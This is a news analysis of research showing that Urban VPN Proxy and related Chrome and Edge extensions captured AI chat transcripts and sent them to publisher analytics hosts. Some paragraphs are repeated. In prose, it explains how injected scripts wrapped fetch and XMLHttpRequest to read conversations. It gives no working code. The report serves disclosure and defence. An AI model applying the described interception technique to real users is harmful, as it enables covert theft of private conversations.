A widely trusted class of browser add-ons—free VPNs, ad blockers and “browser guard” tools—has quietly been turned into a mass data‑collection pipeline, capturing full AI chat transcripts from millions of users and funneling the results to analytics backends operated by the extension publisher and its affiliate, according to independent research and multiple news reports.
Security researchers at Koi Security discovered that a family of extensions published by the same organization injected platform‑specific JavaScript into web pages belonging to major web‑based AI assistants. Those injected “executor” scripts intercept every prompt and every AI response by wrapping the page’s network APIs (notably fetch and XMLHttpRequest) and then forwarding parsed conversation content to the extension background service worker for exfiltration. The technique works inside the page where the content is already available in plaintext, so TLS does not prevent the capture. Koi’s public write‑up identifies the flagship offender as Urban VPN Proxy and three sibling extensions—1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker—available on both the Chrome Web Store and Microsoft Edge Add‑ons. Combined install counts reported by researchers and corroborated by multiple news outlets exceed eight million users across Chrome and Edge, with Urban VPN Proxy alone accounting for roughly six million Chrome installs and more than a million Edge installs. This is not just a narrow metadata leak. The harvested package reportedly includes:
Marketplaces and enterprise security policies were originally designed around ad injection, UI hijacking and privacy policy boxes. The emergence of AI as a daily confidential workspace requires stronger runtime checks, stricter enforcement of Limited Use rules, and an updated threat model for browser‑based agentic tools. Otherwise, “privacy” add‑ons will continue to be a vector for monetising the most intimate forms of user data.
Platform owners, regulators and enterprise IT teams now face an urgent choice: close the inspection gap that allowed this behaviour to pass review, harden extension‑policy enforcement and operationalise runtime vetting; or accept that the same distribution channels that make extensions useful will continue to be exploited to monetise highly sensitive user conversations. In the short term, the practical defense is simple and blunt: audit, uninstall, revoke and block. The longer term fix requires structural changes to how extensions are reviewed, consent is obtained, and runtime behaviour is validated.
Source: theregister.com Chrome, Edge privacy extensions quietly snarf AI chats
Background
Security researchers at Koi Security discovered that a family of extensions published by the same organization injected platform‑specific JavaScript into web pages belonging to major web‑based AI assistants. Those injected “executor” scripts intercept every prompt and every AI response by wrapping the page’s network APIs (notably fetch and XMLHttpRequest) and then forwarding parsed conversation content to the extension background service worker for exfiltration. The technique works inside the page where the content is already available in plaintext, so TLS does not prevent the capture. Koi’s public write‑up identifies the flagship offender as Urban VPN Proxy and three sibling extensions—1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker—available on both the Chrome Web Store and Microsoft Edge Add‑ons. Combined install counts reported by researchers and corroborated by multiple news outlets exceed eight million users across Chrome and Edge, with Urban VPN Proxy alone accounting for roughly six million Chrome installs and more than a million Edge installs. This is not just a narrow metadata leak. The harvested package reportedly includes:- every prompt a user typed;
- every reply the AI returned;
- conversation identifiers and timestamps;
- session metadata and model/platform identifiers;
- and, in some cases, contextual browsing state that can aid re‑identification.
How the harvesting works: a technical breakdown
Executor scripts and per‑platform targeting
Instead of relying on a single generic scraper, the extensions deploy a distinct executor script for each targeted AI service (for example, chatgpt.js, gemini.js, claude.js). These per‑platform scripts detect when a user navigates to a supported assistant and inject code into the page context to extract conversational content in the clearest possible form. That design is targeted—it intentionally adapts to the DOM and network behaviour of each AI front end.Overriding fetch and XMLHttpRequest
The injected code wraps native browser networking APIs—chiefly fetch and XMLHttpRequest—so that requests and responses pass through the extension’s logic before (or as) the page renders them. This is an aggressive and reliable interception method: because the code runs inside the page, it sees content after the browser has decrypted it and before the user sees it, effectively bypassing TLS protections for content exposed in the page context.Packaging and exfiltration
Captured data is packaged and sent from the page to the extension’s content script via window.postMessage with a distinct message tag, then relayed to the background service worker for network exfiltration. Koi’s analysis traces the outgoing traffic to analytics endpoints under the publisher’s control—reported examples include analytics.urban‑vpn.com and stats.urban‑vpn.com—where the data is compressed and stored for downstream use.Default‑on, hidden by updates
Critically, the behaviour was added via an automatic update and enabled by default in the reported build identified as version 5.5.0, released in July 2025. Because Chrome and Edge auto‑update extensions by default, millions of users received the new code without explicit re‑consent, and the harvesting ran without an obvious runtime toggle to stop it. The only guaranteed user control, researchers say, is to disable or uninstall the extension.Which AI services were targeted
Koi’s report and subsequent coverage name major commercial assistants as targets, including:- OpenAI ChatGPT,
- Anthropic Claude,
- Google Gemini,
- Microsoft Copilot,
- Perplexity,
- DeepSeek,
- Grok (xAI),
- Meta AI,
and other web‑based assistants where page structure allowed the executor to hook into responses. That broad coverage makes the dataset richly sensitive because users routinely feed personal health questions, financial details, proprietary code, business strategy and other secrets into these assistants.
The market and the disclosure problem
Urban VPN’s promotional materials and UI present an “AI protection” feature that frames monitoring as a security‑oriented safeguard. However, the company’s privacy policy—buried in legal text—explicitly references collection of “AI inputs and outputs” and permits disclosure of that data for marketing analytics purposes with an affiliated analytics firm identified as BiScience (also styled BIScience or B.I. Science in public documents). These conflicting signals—protective UI language versus legal policy that allows commercial sharing—are central to why researchers call the practice deceptive. At the same time, direct proof that harvested chat logs were sold to specific third‑party buyers (purchase receipts, downstream customer lists, or named contracts) is not publicly documented in forensic detail. The privacy policy explicitly permits disclosure to an affiliate and advertising/intelligence partners, which is a material red flag; however, tracing data monetization inside opaque ad‑tech markets is non‑trivial and public evidence of identified buyers remains indirect. Researchers and reporters therefore treat downstream sales as highly likely and consistent with prior behaviour in the extension/data‑broker ecosystem, while flagging the absence of named buyer receipts as a caveat.Why platform badges and review failed users
Several of the implicated extensions carried the Chrome Web Store “Featured” badge—an indicator Google says signals a manual review and high standard of user experience. That fact has been emphasized repeatedly because a Featured badge functions as a de‑facto trust signal for consumers. Koi and multiple reporters note the paradox: human reviewers apparently cleared or overlooked code that deployed per‑platform executors to harvest data from services including Google’s own Gemini. Google’s Limited Use policy explicitly forbids transferring or selling user data to third‑party data brokers and restricts collection of browsing activity to narrowly disclosed, single‑purpose features. The marketplace’s review processes—especially if they rely primarily on static checks and listing disclosures—appear ill‑equipped to detect runtime behaviors that execute only when a user visits specific AI assistant pages. That gap is what allowed the additional, data‑harvesting behaviour to slip into high‑install extensions. Security researchers have argued this is a structural marketplace failure: static listing checks and a checkbox‑driven privacy policy audit cannot see concealed runtime hooks. The result is that badges and featured placements can be misleading when runtime analysis is absent or insufficient.Corroboration and independent reporting
Koi’s technical analysis was picked up quickly by major outlets—including The Register, Ars Technica, TechRadar, and a range of security‑focused sites—which reproduced Koi’s core findings and confirmed details such as the affected extension family, the per‑platform executor architecture, the exfiltration endpoints named in the write‑up, the July 2025 version change, and the rough install counts. Multiple independent researchers have previously documented related data‑broker activity by the affiliate BiScience, lending historical context to the allegation that this family’s clickstream collection operations extended into AI chat capture. Those cross‑checks increase confidence in the core claims. At the same time, public evidence about the downstream purchasers of any captured chats remains indirect; tracing sales inside ad‑tech and data brokerage markets requires forensic documents or buyer confirmations that have not (yet) been published. Responsible reporting therefore treats the most damning technical claims (capture and exfiltration of chats) as verified while treating specific allegations about buyers as plausible but not exhaustively proven.Legal, privacy and regulatory implications
- Platform policy violations: If the extension actually transferred AI chat logs to a data‑broker affiliate for marketing analytics, that behaviour would appear to violate Chrome Web Store’s Limited Use restrictions and likely similar Microsoft Edge developer policies. Platforms may be obliged to enforce removals, developer account actions or other penalties.
- Consumer protection and privacy law: Depending on where the affected users live and what the chats contained, regulators could view mass harvesting of conversational content as unfair, deceptive or unlawfully intrusive. Personal data in AI chats—health, financial, identity identifiers—can trigger obligations under GDPR, CCPA and other regimes.
- Enterprise risk and compliance: Corporate users who allowed these extensions on work profiles may have leaked confidential business information or secrets into an unvetted consumer pipeline, creating exposure for trade secrets, contract obligations and regulated data. Enterprises must treat the incident as a credible data leakage vector.
Practical remediation and defensive steps
Immediate steps for individual users- Uninstall any of the named extensions: Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker. Manual removal is the only sure way to stop an installed malicious extension from running.
- Assume chats are compromised: Treat any AI conversations conducted since July 2025 (and particularly after the indicated July 9, 2025 update) as potentially exposed if the extension was installed. Rotate passwords, revoke tokens, and reissue any credentials or API keys pasted into those chats.
- Clear sync storage and sign out of browser sync if you suspect leakages could follow synced storage or IDs across devices. Enable multi‑factor authentication where possible.
- Enforce extension allowlists and blocklists centrally through Chrome Enterprise/Intune/GPO and Edge administrative controls: add the offending extension IDs to blacklists and prevent re‑installation. Use the store extension IDs identified by researchers to quickly block installs.
- Conduct a scoped incident response: identify users that had the extensions installed and cross‑reference their AI usage to scope likely exfiltration. Rotate any company secrets that might have been disclosed in those sessions.
- Update procurement and policy: prohibit unmanaged browser extensions on profiles used for sensitive work; require a vetted, enterprise‑managed extension catalog for employees.
- Platforms should run dynamic, runtime tests that exercise extensions against popular web services (including AI assistants), not just static manifest checks.
- Require forced re‑consent or a sandboxed runtime approval when an extension’s behaviour materially changes (e.g., new data flows to remote endpoints).
- Consider a higher privilege gating model for extensions that request blanket “read and change data on all sites” access—similar to mobile runtime permission prompts that fire at the time of risky behavior.
Strengths, limits and unanswered questions
What is well supported- The technical mechanism—per‑platform executor scripts that hook fetch/XHR and exfiltrate conversation text—is described in detailed analysis and reproduced in multiple independent write‑ups and news reports.
- The timeline (behaviour introduced via version 5.5.0 in July 2025 and distributed by automatic updates) and the broad install counts are consistent across the primary technical disclosure and independent reporting.
- Public evidence that specific third‑party buyers purchased particular conversation logs is indirect: the publisher’s privacy policy names sharing with an affiliate ad/analytics firm (BiScience), which strongly suggests commercialisation, but public, named buyer receipts are not part of the disclosed corpus. Treat claims of particular downstream sales as plausible and highly suspicious, but note the lack of forensic purchaser evidence in the public record.
- Has the publisher retained conversation logs indefinitely or applied deletion/retention rules?
- Which specific downstream partners (if any) ingested datasets drawn from these conversations?
- What enforcement action will platform owners take (takedown, developer account suspension, audits)?
- If the extension remains on any stores or in caches, what steps will Google and Microsoft take to prevent re‑publication under a different package?
Big picture: why this matters beyond one extension family
This incident highlights a systemic problem: the browser extension model grants powerful runtime privileges and seamless update mechanisms that can be abused to change an app’s behaviour at scale without users noticing. When those privileges intersect with AI assistants—tools people use for deeply personal and business‑critical conversations—the potential harms shift from ad annoyance to serious data leakage of sensitive secrets.Marketplaces and enterprise security policies were originally designed around ad injection, UI hijacking and privacy policy boxes. The emergence of AI as a daily confidential workspace requires stronger runtime checks, stricter enforcement of Limited Use rules, and an updated threat model for browser‑based agentic tools. Otherwise, “privacy” add‑ons will continue to be a vector for monetising the most intimate forms of user data.
Conclusion
The Koi Security findings and rapid corroboration by independent outlets reveal a troubling reality: browser extensions marketed for privacy can be engineered to betray that trust at scale, harvesting full AI conversations and routing them to analytics backends linked to an affiliate data‑broker. The technical details—per‑platform executor scripts, fetch/XHR interception, automatic updates and default‑on harvesting—are clear and repeatable, and the install counts make the incident consequential.Platform owners, regulators and enterprise IT teams now face an urgent choice: close the inspection gap that allowed this behaviour to pass review, harden extension‑policy enforcement and operationalise runtime vetting; or accept that the same distribution channels that make extensions useful will continue to be exploited to monetise highly sensitive user conversations. In the short term, the practical defense is simple and blunt: audit, uninstall, revoke and block. The longer term fix requires structural changes to how extensions are reviewed, consent is obtained, and runtime behaviour is validated.
Source: theregister.com Chrome, Edge privacy extensions quietly snarf AI chats